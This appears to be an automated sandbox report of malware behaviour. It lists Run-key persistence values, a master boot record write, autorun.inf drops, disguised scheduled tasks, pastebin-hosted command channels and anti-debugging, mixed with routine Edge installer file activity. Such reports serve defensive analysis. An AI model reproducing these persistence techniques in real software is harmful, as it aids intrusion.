Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\Desktop\Files\XClient.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_16933.exe" | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\F: | C:\Windows\system32\wbem\wmiprvse.exe | N/A

Installs/modifies Browser Helper Object

stealer adware

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A
N/A | ip-api.com | N/A | N/A

Writes to the Master Boot Record (MBR)

bootkit persistence

Description | Indicator | Process | Target
File opened for modification | \??\PHYSICALDRIVE0 | C:\Users\Admin\Desktop\Files\random.exe | N/A

Detected potential entity reuse from brand MICROSOFT.

phishing microsoft

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Drops autorun.inf file

Description | Indicator | Process | Target
File created | F:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A
File opened for modification | F:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A
File created | C:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A
File opened for modification | C:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\System32\Tasks\svhost | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\Discord | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\ctfmon | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\System32\Tasks\$77Security | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\$77svchost | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\StUpdate | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\Test Task17 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\Desktop Background.bmp" C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\Files\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\PowerRat.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\af.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\it.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\msedge.dll.sig C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\vcruntime140.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kk.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\vk_swiftshader.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\sr-Cyrl-BA.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\mr.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\uk.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\hu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kok.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\manifest.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\pt-BR.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\am.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\resources.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\he.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\MEIPreload\preloaded_data.pb C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\MEIPreload\manifest.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Extensions\external_extensions.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\qu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ar.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\qu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\gl.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Temp\source2316_2140335734\MSEDGE.7z C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\msedge.exe C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\Content C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\edge_game_assist\EdgeGameAssist.msix C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Trust Protection Lists\Mu\Other C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\km.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\ms.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\nn.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\Other C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\es.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\bg.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\ko.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\microsoft_shell_integration.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\Advertising C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ne.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\VisualElements\LogoBeta.png C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Extensions\external_extensions.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\prefs_enclave_x64.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\as.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\nl.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\hu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\133.0.3065.59.manifest C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\te.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\th.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\VisualElements\SmallLogo.png C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Trust Protection Lists\Sigma\Analytics C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\bn-IN.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\mi.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\ad-selection-attestations.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\concrt140.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\wns_push_client.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\el.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\nn.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kk.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\LICENSE C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\beta.identity_helper.exe.manifest C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\ad-selection-attestations.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Mu\Entities C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ga.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\bn-IN.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\5892_13383894525762369_5892.pma C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
